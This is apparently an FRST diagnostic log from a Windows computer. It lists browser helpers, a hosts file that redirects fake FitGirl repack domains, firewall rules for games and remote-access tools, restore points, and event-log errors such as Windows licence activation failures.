AlternateDataStreams: C:\Users\Tomika\AppData\Local\Temp:com.affinity.publisher.1 [241]
==================== Safe Mode (Whitelisted) ==================
==================== Association (Whitelisted) =================
==================== Internet Explorer (Whitelisted) ==========
BHO: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office\Office16\OCHelper.dll [2020-08-12] (Microsoft Corporation -> Microsoft Corporation)
BHO: No Name -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> No File
BHO: Adobe Acrobat Create PDF Helper -> {AE7CD045-E861-484f-8273-0445EE161910} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\WCIEActiveX\x64\AcroIEFavClient.dll [2014-05-08] (Adobe Systems, Incorporated -> Adobe Systems Incorporated)
BHO: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office\Office16\GROOVEEX.DLL [2018-07-20] (Microsoft Corporation -> Microsoft Corporation)
BHO: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre-10.0.1\bin\jp2ssv.dll [2018-05-18] (Oracle America, Inc. -> Oracle Corporation)
BHO: Adobe Acrobat Create PDF from Selection -> {F4971EE7-DAA0-4053-9964-665D8EE6A077} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\WCIEActiveX\x64\AcroIEFavClient.dll [2014-05-08] (Adobe Systems, Incorporated -> Adobe Systems Incorporated)
BHO-x32: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\Office16\OCHelper.dll [2020-08-12] (Microsoft Corporation -> Microsoft Corporation)
BHO-x32: Adobe Acrobat Create PDF Helper -> {AE7CD045-E861-484f-8273-0445EE161910} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\WCIEActiveX\AcroIEFavClient.dll [2014-05-08] (Adobe Systems, Incorporated -> Adobe Systems Incorporated)
BHO-x32: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\Office16\GROOVEEX.DLL [2018-07-22] (Microsoft Corporation -> Microsoft Corporation)
BHO-x32: Adobe Acrobat Create PDF from Selection -> {F4971EE7-DAA0-4053-9964-665D8EE6A077} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\WCIEActiveX\AcroIEFavClient.dll [2014-05-08] (Adobe Systems, Incorporated -> Adobe Systems Incorporated)
Toolbar: HKLM - Adobe Acrobat Create PDF Toolbar - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\WCIEActiveX\x64\AcroIEFavClient.dll [2014-05-08] (Adobe Systems, Incorporated -> Adobe Systems Incorporated)
Toolbar: HKLM-x32 - Adobe Acrobat Create PDF Toolbar - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\WCIEActiveX\AcroIEFavClient.dll [2014-05-08] (Adobe Systems, Incorporated -> Adobe Systems Incorporated)
Handler: mso-minsb.16 - {3459B272-CC19-4448-86C9-DDC3B4B2FAD3} - C:\Program Files\Microsoft Office\Office16\MSOSB.DLL [2019-06-12] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: mso-minsb.16 - {3459B272-CC19-4448-86C9-DDC3B4B2FAD3} - C:\Program Files (x86)\Microsoft Office\Office16\MSOSB.DLL [2019-06-12] (Microsoft Corporation -> Microsoft Corporation)
Handler: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files\Microsoft Office\Office16\MSOSB.DLL [2019-06-12] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files (x86)\Microsoft Office\Office16\MSOSB.DLL [2019-06-12] (Microsoft Corporation -> Microsoft Corporation)
==================== Hosts content: =========================
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
2013-08-22 15:25 - 2020-03-13 10:57 - 000001256 _____ C:\Windows\system32\drivers\etc\hosts
109.94.209.70 fitgirlrepacks.co # Fake FitGirl site
109.94.209.70 fitgirl-repacks.cc # Fake FitGirl site
109.94.209.70 fitgirl-repack.com # Fake FitGirl site
109.94.209.70 www.fitgirlrepacks.co # Fake FitGirl site
109.94.209.70 www.fitgirl-repacks.cc # Fake FitGirl site
109.94.209.70 www.fitgirl-repack.com # Fake FitGirl site
2016-05-06 18:24 - 2016-06-16 16:34 - 000000511 _____ C:\Windows\system32\drivers\etc\hosts.ics
5 13 16 50 17 837
192.168.137.1 Tom.mshome.net # 2021 5 3 5 21 35 24 561
==================== Other Areas ===========================
(Currently there is no automatic fix for this section.)
HKLM\System\CurrentControlSet\Control\Session Manager\Environment\\Path -> C:\Program Files (x86)\Python37-32\Scripts\;C:\Program Files (x86)\Python37-32\;C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files (x86)\NVIDIA Corporation\PhysX\Common;C:\Windows\Microsoft.NET\Framework\v2.0.50727;D:\Programy\LLVM\bin;C:\Program Files\dotnet\;C:\Program Files\Git\cmd;C:\Program Files (x86)\Mitov\Visuino
HKU\S-1-5-21-2643689781-145595849-2857803826-1001\Control Panel\Desktop\\Wallpaper ->
DNS Servers: 192.168.81.1 - 213.46.172.38
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: RequireAdmin)
Windows Firewall is enabled.
Network Binding:
=============
Ethernet: Npcap Packet Driver (NPCAP) -> insecure_npcap (enabled)
==================== MSCONFIG/TASK MANAGER disabled items ==
(If an entry is included in the fixlist, it will be removed.)
HKLM\...\StartupApproved\Run: => "AdobeAAMUpdater-1.0"
HKLM\...\StartupApproved\Run32: => "AdobeCS6ServiceManager"
HKLM\...\StartupApproved\Run32: => "Adobe ARM"
HKLM\...\StartupApproved\Run32: => "ADSKAppManager"
HKLM\...\StartupApproved\Run32: => "SwitchBoard"
HKLM\...\StartupApproved\Run32: => "Adobe Creative Cloud"
==================== FirewallRules (Whitelisted) ================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
FirewallRules: [TCP Query User{9AD01E6D-EDE0-4C26-8794-C1ACDF29844C}D:\programy\hearthstone\hearthstone.exe] => (Allow) D:\programy\hearthstone\hearthstone.exe => No File
FirewallRules: [UDP Query User{A737DDAD-B775-42F7-969B-B54749BB548F}D:\programy\hearthstone\hearthstone.exe] => (Allow) D:\programy\hearthstone\hearthstone.exe => No File
FirewallRules: [{C0BFCA61-6769-4387-99FB-313A10D98354}] => (Allow) LPort=1542
FirewallRules: [{F504ABC0-A8FD-4D88-872C-BFB0357F7DDB}] => (Allow) LPort=1542
FirewallRules: [{1F8EB603-5FF8-4688-8E08-79E2DA138F65}] => (Allow) LPort=53
FirewallRules: [TCP Query User{3462722B-DE6F-4647-9F68-0E5009544BFA}D:\download\download_chrome\ij150-win-java8\imagej\imagej.exe] => (Allow) D:\download\download_chrome\ij150-win-java8\imagej\imagej.exe () [File not signed]
FirewallRules: [UDP Query User{2CF8A8C3-A1C3-4199-99CC-D51EB01C5B64}D:\download\download_chrome\ij150-win-java8\imagej\imagej.exe] => (Allow) D:\download\download_chrome\ij150-win-java8\imagej\imagej.exe () [File not signed]
FirewallRules: [{9CADBC3E-64E4-40F6-A8F6-C6D24135B717}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe (NVIDIA Corporation -> NVIDIA Corporation)
FirewallRules: [{79C6053B-6247-46D6-8E3B-B95FBFDE571A}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe (NVIDIA Corporation -> NVIDIA Corporation)
FirewallRules: [{18774EFC-EDAD-4F19-BCE4-BA023A4A898E}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamUserAgent.exe (NVIDIA Corporation -> NVIDIA Corporation)
FirewallRules: [{1F714EF3-F860-426A-A9EC-0A32EDC7BC3A}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe (NVIDIA Corporation -> NVIDIA Corporation)
FirewallRules: [{40D21C12-D563-4D39-B50E-056DD7852CFD}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe (NVIDIA Corporation -> NVIDIA Corporation)
FirewallRules: [{EB44BCFA-7554-4888-93B9-456144AA6ED0}] => (Allow) D:\Programy\Ubisoft Game Launcher\games\Assassin's Creed II\UPlayBrowser.exe (UBISOFT ENTERTAINMENT INC. -> Ubisoft Entertainment)
FirewallRules: [{440F975A-77E6-4DC1-857F-5D47B5EF6175}] => (Allow) D:\Programy\Ubisoft Game Launcher\games\Assassin's Creed II\UPlayBrowser.exe (UBISOFT ENTERTAINMENT INC. -> Ubisoft Entertainment)
FirewallRules: [{3B0A6297-0985-4D08-8FD1-99DB730EFBBD}] => (Allow) D:\Programy\steam\Steam.exe (Valve -> Valve Corporation)
FirewallRules: [{E318FA87-164F-4371-9CD7-830A02EA7E57}] => (Allow) D:\Programy\steam\Steam.exe (Valve -> Valve Corporation)
FirewallRules: [{8085AEA6-DBC3-4EDC-8B9C-6C73487D5161}] => (Allow) D:\Programy\steam\bin\cef\cef.win7\steamwebhelper.exe (Valve -> Valve Corporation)
FirewallRules: [{710EA0F8-1658-43F9-8E62-A185324EE35E}] => (Allow) D:\Programy\steam\bin\cef\cef.win7\steamwebhelper.exe (Valve -> Valve Corporation)
FirewallRules: [{84F54D52-BF8C-4DE7-B761-67F42861E894}] => (Allow) D:\Programy\wolfram mathematica 11\Mathematica.exe (Wolfram Research, Inc. -> Wolfram Research, Inc.)
FirewallRules: [{DAB6E844-69B2-4A0D-B4D7-FEA33AE13AA0}] => (Allow) D:\Programy\wolfram mathematica 11\Mathematica.exe (Wolfram Research, Inc. -> Wolfram Research, Inc.)
FirewallRules: [{52570D7A-3FDB-47AC-96E1-1CD4749A6AC5}] => (Allow) D:\Programy\wolfram mathematica 11\MathKernel.exe (Wolfram Research, Inc. -> Wolfram Research, Inc.)
FirewallRules: [{72C16DE6-5F6E-4C7A-A05A-D8E6CA5BDD48}] => (Allow) D:\Programy\wolfram mathematica 11\MathKernel.exe (Wolfram Research, Inc. -> Wolfram Research, Inc.)
FirewallRules: [{64C1867B-06C3-4F4D-BFEE-BFD5E8FD454A}] => (Allow) D:\Programy\wolfram mathematica 11\math.exe (Wolfram Research, Inc. -> Wolfram Research, Inc.)
FirewallRules: [{536FD2FD-654E-4B01-BA28-18CAB6CC6173}] => (Allow) D:\Programy\wolfram mathematica 11\math.exe (Wolfram Research, Inc. -> Wolfram Research, Inc.)
FirewallRules: [{86092937-B01E-44C7-98CA-78F067D83097}] => (Allow) D:\Programy\PotPlayer\PotPlayerMini64.exe (Kakao corp. -> Kakao)
FirewallRules: [{D822C388-756D-419B-A32F-077778123373}] => (Allow) D:\Programy\PotPlayer\PotPlayerMini64.exe (Kakao corp. -> Kakao)
FirewallRules: [{9483F894-9CD7-40D9-97A4-9A254B38B2E2}] => (Allow) D:\Programy\Mr DJ\Call of Duty 2\CoD2SP_s.exe () [File not signed]
FirewallRules: [{4B073B04-BB23-4AF4-9D01-18F6A857C5A5}] => (Allow) D:\Programy\Mr DJ\Call of Duty 2\CoD2SP_s.exe () [File not signed]
FirewallRules: [{3F5D3EC2-8C07-48A9-A1E7-549AA8E798EF}] => (Allow) D:\Programy\Ubisoft Game Launcher\games\Assassin's Creed II\AssassinsCreedIIGame.exe (Ubisoft Entertainment -> )
FirewallRules: [{DC89694B-B938-4F52-AE55-815B8176FEF1}] => (Allow) D:\Programy\Ubisoft Game Launcher\games\Assassin's Creed II\AssassinsCreedIIGame.exe (Ubisoft Entertainment -> )
FirewallRules: [{45D9FC93-D3D0-492B-8F49-63DB88E81B86}] => (Allow) D:\Programy\steam\steamapps\common\Alien Swarm Reactive Drop\reactivedrop.exe () [File not signed]
FirewallRules: [{D2F17CF0-FBCA-441F-8FDE-A97D1AFED72C}] => (Allow) D:\Programy\steam\steamapps\common\Alien Swarm Reactive Drop\reactivedrop.exe () [File not signed]
FirewallRules: [{1A7722A8-6C68-4E08-9654-EE38A7DE4A6C}] => (Allow) D:\Programy\steam\steamapps\common\Torchlight II\ModLauncher.exe (Runic Games, Inc. -> Runic Games, Inc.)
FirewallRules: [{1B1A54D2-02ED-4791-BF2F-EDD3B463C46E}] => (Allow) D:\Programy\steam\steamapps\common\Torchlight II\ModLauncher.exe (Runic Games, Inc. -> Runic Games, Inc.)
FirewallRules: [{C42697B3-7F4A-437C-B4B8-74107E0DFCD7}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{90D1047B-2E4D-46BB-B7E8-DF05DF213F14}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{0175C92F-A1AD-4D10-8E4C-CF3D2DD72C44}] => (Allow) D:\Programy\CCleaner\CCUpdate.exe (Piriform Software Ltd -> Piriform Software Ltd)
FirewallRules: [{58B05CB9-C375-4D64-8906-28E5F17E4EE8}] => (Allow) D:\Programy\CCleaner\CCUpdate.exe (Piriform Software Ltd -> Piriform Software Ltd)
FirewallRules: [{C967F151-1891-4F21-86EB-ECF7811CD148}] => (Allow) C:\Users\Tomika\Downloads\Lindo-2.2.0-win\Lindo.exe (Prixe) [File not signed]
FirewallRules: [{DE3B2D5D-EBE7-4127-8B80-E91C3EA67D63}] => (Allow) C:\Users\Tomika\Downloads\Lindo-2.2.0-win\Lindo.exe (Prixe) [File not signed]
FirewallRules: [{526DDF0E-F163-44E3-8E56-F8608F65A9F8}] => (Allow) C:\Users\Tomika\Downloads\Lindo-2.2.0-win\Lindo.exe (Prixe) [File not signed]
FirewallRules: [{769336BD-9379-4490-8F9F-E9FA1CC2DCAB}] => (Allow) C:\Users\Tomika\Downloads\Lindo-2.2.0-win\Lindo.exe (Prixe) [File not signed]
FirewallRules: [TCP Query User{58028633-BF2A-440C-A580-BF4C8A4AA820}D:\download\download_torrenty\foundation.v1.0.15\foundation.exe] => (Allow) D:\download\download_torrenty\foundation.v1.0.15\foundation.exe (Polymorph Games) [File not signed]
FirewallRules: [UDP Query User{2A70850E-96CF-47FB-9C90-E3E834183FC8}D:\download\download_torrenty\foundation.v1.0.15\foundation.exe] => (Allow) D:\download\download_torrenty\foundation.v1.0.15\foundation.exe (Polymorph Games) [File not signed]
FirewallRules: [{DF3AB8C6-D5A5-4D24-B8B9-3638A08EC446}] => (Allow) D:\Programy\Davinci\Resolve.exe (Blackmagic Design Pty Ltd -> Blackmagic Design Pty. Ltd.)
FirewallRules: [{90E1D846-5A9C-4EC5-A6B7-586E01CFF434}] => (Allow) D:\Programy\Davinci\bmdpaneld.exe () [File not signed]
FirewallRules: [{D761FCC8-0F10-4D82-BE98-4050364F04A5}] => (Allow) D:\Programy\Davinci\DaVinciPanelDaemon.exe () [File not signed]
FirewallRules: [{76BFF8C8-BF48-47CB-ABA4-B5E82F0092F1}] => (Allow) D:\Programy\Davinci\JLCooperPanelDaemon.exe () [File not signed]
FirewallRules: [{3B3E0F92-9C5A-4438-BE0E-F5270535AE28}] => (Allow) D:\Programy\Davinci\EuphonixPanelDaemon.exe () [File not signed]
FirewallRules: [{6EFDD34F-0329-4EFC-95E8-FC81B0AC31E6}] => (Allow) D:\Programy\Davinci\TangentPanelDaemon.exe () [File not signed]
FirewallRules: [{6E00C352-B8B4-4A2F-8CDF-D1F3527383C5}] => (Allow) D:\Programy\Davinci\DPDecoder.exe (Blackmagic Design Pty Ltd -> )
FirewallRules: [TCP Query User{455134ED-7753-4DAA-9476-D27AC787F88F}D:\download\download_torrenty\the.flame.in.the.flood.v1.3.003\rivergame\binaries\win64\rivergame-win64-shipping.exe] => (Block) D:\download\download_torrenty\the.flame.in.the.flood.v1.3.003\rivergame\binaries\win64\rivergame-win64-shipping.exe (Epic Games, Inc.) [File not signed]
FirewallRules: [UDP Query User{D44AE864-5838-42D9-83BA-8489DF255FC8}D:\download\download_torrenty\the.flame.in.the.flood.v1.3.003\rivergame\binaries\win64\rivergame-win64-shipping.exe] => (Block) D:\download\download_torrenty\the.flame.in.the.flood.v1.3.003\rivergame\binaries\win64\rivergame-win64-shipping.exe (Epic Games, Inc.) [File not signed]
FirewallRules: [{9219AFA1-328C-4A5F-940B-2B4CEDB13268}] => (Allow) C:\Program Files\Microsoft Office\Office16\lync.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{9593C68A-1FB3-401D-B3D1-94DE01DC259D}] => (Allow) C:\Program Files\Microsoft Office\Office16\lync.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{AC130793-2F89-41A6-8F71-BD60903E5296}] => (Allow) C:\Program Files\Microsoft Office\Office16\UcMapi.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{278E464D-115C-4F75-8C47-85993E13BF84}] => (Allow) C:\Program Files\Microsoft Office\Office16\UcMapi.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{FFC2B8AE-1939-4CCB-BEBF-9F490C9824FD}] => (Allow) D:\Games\Nuked Cockroach Launcher\Nuked_Cockroach_Launcher.exe (XSOLLA) [File not signed]
FirewallRules: [{9ED468EA-581E-4246-B93F-5916686EA2D8}] => (Allow) D:\Games\Nuked Cockroach Launcher\Nuked_Cockroach_Launcher.exe (XSOLLA) [File not signed]
FirewallRules: [TCP Query User{C739BBFF-E446-45DB-944D-7B4F5076D9A2}D:\games\nuked cockroach launcher\veterans online\default\game\veterans online.exe] => (Allow) D:\games\nuked cockroach launcher\veterans online\default\game\veterans online.exe () [File not signed]
FirewallRules: [UDP Query User{A8866385-5792-4382-BC8A-D85DF28E84FE}D:\games\nuked cockroach launcher\veterans online\default\game\veterans online.exe] => (Allow) D:\games\nuked cockroach launcher\veterans online\default\game\veterans online.exe () [File not signed]
FirewallRules: [TCP Query User{7DD8787E-C39E-492D-B408-1EBE71BA1033}D:\games\nuked cockroach launcher\launcher.exe] => (Allow) D:\games\nuked cockroach launcher\launcher.exe (XSOLLA) [File not signed]
FirewallRules: [UDP Query User{19498341-E34B-4AD7-8763-750721C1E717}D:\games\nuked cockroach launcher\launcher.exe] => (Allow) D:\games\nuked cockroach launcher\launcher.exe (XSOLLA) [File not signed]
FirewallRules: [TCP Query User{40725FB9-3F90-459F-AFCB-8F49624A8371}D:\programy\arduino\java\bin\javaw.exe] => (Allow) D:\programy\arduino\java\bin\javaw.exe
FirewallRules: [UDP Query User{B96FE167-8E44-4F35-8659-15B21539D00D}D:\programy\arduino\java\bin\javaw.exe] => (Allow) D:\programy\arduino\java\bin\javaw.exe
FirewallRules: [{B6609402-D440-46AB-A838-3492539975C8}] => (Allow) D:\Programy\qBittorrent\qbittorrent.exe () [File not signed]
FirewallRules: [{973AD33C-750E-4AEF-9E33-45E7C1B41823}] => (Allow) D:\Programy\qBittorrent\qbittorrent.exe () [File not signed]
FirewallRules: [{253B106F-1C56-48CB-B28D-46DB43BEB0D9}] => (Allow) D:\Programy\steam\steamapps\common\We Were Here\We Were Here VR.exe => No File
FirewallRules: [{851ADD7C-BEDD-4C11-BE3E-59E9697058C5}] => (Allow) D:\Programy\steam\steamapps\common\We Were Here\We Were Here VR.exe => No File
FirewallRules: [{6D8B4E9E-398F-4BE6-8191-6236039CD875}] => (Allow) D:\Programy\steam\steamapps\common\Lara Croft and the Temple of Osiris\LC2.exe (Square Enix Ltd.) [File not signed]
FirewallRules: [{2A4160D9-8A8D-4D49-8EC2-5799EEC41DFE}] => (Allow) D:\Programy\steam\steamapps\common\Lara Croft and the Temple of Osiris\LC2.exe (Square Enix Ltd.) [File not signed]
FirewallRules: [TCP Query User{B0830E4B-499A-46AD-B5EB-4630A4AE2BBF}C:\users\tomika\appdata\local\gamecenter\gamecenter.exe] => (Allow) C:\users\tomika\appdata\local\gamecenter\gamecenter.exe (Mail.Ru LLC -> )
FirewallRules: [UDP Query User{43CBB4F4-2E71-41CE-B0CA-F8EAE8F74F09}C:\users\tomika\appdata\local\gamecenter\gamecenter.exe] => (Allow) C:\users\tomika\appdata\local\gamecenter\gamecenter.exe (Mail.Ru LLC -> )
FirewallRules: [TCP Query User{816B0942-C37F-4F80-BEA2-7E3C90414862}D:\mygames\warface my.com\bin64release\game.exe] => (Allow) D:\mygames\warface my.com\bin64release\game.exe (warface -> Crytek GmbH)
FirewallRules: [UDP Query User{D031D023-83AB-49B8-8086-1452092B4A60}D:\mygames\warface my.com\bin64release\game.exe] => (Allow) D:\mygames\warface my.com\bin64release\game.exe (warface -> Crytek GmbH)
FirewallRules: [TCP Query User{7CB2C87F-404A-41EF-9381-B51BD7A9AD61}D:\games\desperados 3\desperados iii.exe] => (Allow) D:\games\desperados 3\desperados iii.exe () [File not signed]
FirewallRules: [UDP Query User{B0E49713-2170-4625-8CE7-1947CF2445D5}D:\games\desperados 3\desperados iii.exe] => (Allow) D:\games\desperados 3\desperados iii.exe () [File not signed]
FirewallRules: [TCP Query User{9A5A2BD0-35C2-4DDF-A5C6-E6DBC6D64655}D:\download\anydesk.exe] => (Allow) D:\download\anydesk.exe (philandro Software GmbH -> philandro Software GmbH)
FirewallRules: [UDP Query User{149E8202-B5BE-4B0F-BF46-CC86E6625851}D:\download\anydesk.exe] => (Allow) D:\download\anydesk.exe (philandro Software GmbH -> philandro Software GmbH)
FirewallRules: [{CDCDCA1D-A959-4A82-A5F8-0C2C67C2C231}] => (Allow) D:\Programy\TeamViewer\TeamViewer.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
FirewallRules: [{1BD88D15-D993-4345-BF4F-535DEE0A908E}] => (Allow) D:\Programy\TeamViewer\TeamViewer.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
FirewallRules: [{A925788E-9D19-4369-88A0-D0FA8376AE79}] => (Allow) D:\Programy\TeamViewer\TeamViewer_Service.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
FirewallRules: [{1F853AED-4107-4F14-BDDF-ED58CB05BDC3}] => (Allow) D:\Programy\TeamViewer\TeamViewer_Service.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
FirewallRules: [{06D1F245-05F2-409F-A4BE-9837E07CD260}] => (Allow) C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{2569DC12-C2E2-4F91-88CA-7632295A63DE}] => (Allow) C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [TCP Query User{1A2359B7-F628-4318-A8B1-6AD77A67BCAA}D:\programy\steam\steamapps\common\tera\client\binaries\tera.exe] => (Allow) D:\programy\steam\steamapps\common\tera\client\binaries\tera.exe (KRAFTON, Inc. -> Epic Games, Inc.)
FirewallRules: [UDP Query User{4D399D8C-48FA-4BA2-8612-E595A8C33A6E}D:\programy\steam\steamapps\common\tera\client\binaries\tera.exe] => (Allow) D:\programy\steam\steamapps\common\tera\client\binaries\tera.exe (KRAFTON, Inc. -> Epic Games, Inc.)
FirewallRules: [TCP Query User{984671D7-51AF-4F30-BF3B-8DE783B344B9}D:\games\wasteland 3\wl3.exe] => (Block) D:\games\wasteland 3\wl3.exe () [File not signed]
FirewallRules: [UDP Query User{4544E668-7F0F-4E2B-A3E8-5825E1798ABB}D:\games\wasteland 3\wl3.exe] => (Block) D:\games\wasteland 3\wl3.exe () [File not signed]
FirewallRules: [{406231D4-1E8F-4951-A3F0-C9DE3789D466}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC -> Google LLC)
==================== Restore Points =========================
03-10-2020 13:33:03 Scheduled Checkpoint
09-10-2020 19:32:01 Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.40660
09-10-2020 19:32:10 Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.40649
13-10-2020 20:26:05 Windows Update
22-10-2020 20:30:31 Scheduled Checkpoint
==================== Faulty Device Manager Devices ============
==================== Event log errors: ========================
Application errors:
==================
Error: (10/23/2020 08:29:14 AM) (Source: Software Protection Platform Service) (EventID: 8198) (User: )
Description: License Activation (slui.exe) failed with the following error code:
hr=0xC004F074
Command-line arguments:
RuleId=502ff3ba-669a-4674-bbb1-601f34a3b968;Action=AutoActivateSilent;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=c06b6981-d7fd-4a35-b7b4-054742b7af67;NotificationInterval=1440;Trigger=UserLogon;SessionId=4
Error: (10/23/2020 08:29:12 AM) (Source: Software Protection Platform Service) (EventID: 8198) (User: )
Description: License Activation (slui.exe) failed with the following error code:
hr=0xC004F074
Command-line arguments:
RuleId=502ff3ba-669a-4674-bbb1-601f34a3b968;Action=AutoActivateSilent;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=c06b6981-d7fd-4a35-b7b4-054742b7af67;NotificationInterval=1440;Trigger=NetworkAvailable
Error: (10/22/2020 08:30:32 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 513) (User: )
Description: Cryptographic Services failed while processing the OnIdentity() call in the System Writer Object.
Details:
AddLegacyDriverFiles: Unable to back up image of binary Microsoft Link-Layer Discovery Protocol.
System Error:
Access is denied.
.
Error: (10/22/2020 08:15:31 PM) (Source: Software Protection Platform Service) (EventID: 8198) (User: )
Description: License Activation (slui.exe) failed with the following error code:
hr=0xC004F074
Command-line arguments:
RuleId=502ff3ba-669a-4674-bbb1-601f34a3b968;Action=AutoActivateSilent;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=c06b6981-d7fd-4a35-b7b4-054742b7af67;NotificationInterval=1440;Trigger=NetworkAvailable
Error: (10/22/2020 08:14:44 PM) (Source: Software Protection Platform Service) (EventID: 8198) (User: )
Description: License Activation (slui.exe) failed with the following error code:
hr=0xC004F074
Command-line arguments:
RuleId=502ff3ba-669a-4674-bbb1-601f34a3b968;Action=AutoActivateSilent;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=c06b6981-d7fd-4a35-b7b4-054742b7af67;NotificationInterval=1440;Trigger=NetworkAvailable
Error: (10/22/2020 07:47:54 PM) (Source: Software Protection Platform Service) (EventID: 8198) (User: )
Description: License Activation (slui.exe) failed with the following error code:
hr=0xC004F074
Command-line arguments:
RuleId=502ff3ba-669a-4674-bbb1-601f34a3b968;Action=AutoActivateSilent;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=c06b6981-d7fd-4a35-b7b4-054742b7af67;NotificationInterval=1440;Trigger=UserLogon;SessionId=3
Error: (10/22/2020 07:47:50 PM) (Source: Software Protection Platform Service) (EventID: 8198) (User: )
Description: License Activation (slui.exe) failed with the following error code:
hr=0xC004F074
Command-line arguments:
RuleId=502ff3ba-669a-4674-bbb1-601f34a3b968;Action=AutoActivateSilent;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=c06b6981-d7fd-4a35-b7b4-054742b7af67;NotificationInterval=1440;Trigger=NetworkAvailable
Error: (10/22/2020 07:47:00 PM) (Source: Software Protection Platform Service) (EventID: 8198) (User: )
Description: License Activation (slui.exe) failed with the following error code:
hr=0xC004F074
Command-line arguments:
RuleId=502ff3ba-669a-4674-bbb1-601f34a3b968;Action=AutoActivateSilent;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=c06b6981-d7fd-4a35-b7b4-054742b7af67;NotificationInterval=1440;Trigger=TimerEvent
System errors:
=============
Error: (10/23/2020 09:33:42 AM) (Source: DCOM) (EventID: 10010) (User: Tom)
Description: The server {1B1F472E-3221-4826-97DB-2C2324D389AE} did not register with DCOM within the required timeout.
Error: (10/23/2020 09:33:12 AM) (Source: DCOM) (EventID: 10010) (User: Tom)
Description: The server {BF6C1E47-86EC-4194-9CE5-13C15DCB2001} did not register with DCOM within the required timeout.
Error: (10/22/2020 11:37:26 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: The application-specific permission settings do not grant Local Activation permission for the COM Server application with CLSID
{D63B10C5-BB46-4990-A94F-E40B9D520160}
and APPID
{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}
to the user NT AUTHORITY\SYSTEM SID (S-1-5-18) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool.
Error: (10/22/2020 08:19:36 PM) (Source: DCOM) (EventID: 10010) (User: Tom)
Description: The server {1B1F472E-3221-4826-97DB-2C2324D389AE} did not register with DCOM within the required timeout.
Error: (10/22/2020 08:19:06 PM) (Source: DCOM) (EventID: 10010) (User: Tom)
Description: The server {BF6C1E47-86EC-4194-9CE5-13C15DCB2001} did not register with DCOM within the required timeout.
Error: (10/21/2020 11:41:53 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: The application-specific permission settings do not grant Local Activation permission for the COM Server application with CLSID
{D63B10C5-BB46-4990-A94F-E40B9D520160}
and APPID
{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}
to the user NT AUTHORITY\SYSTEM SID (S-1-5-18) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool.
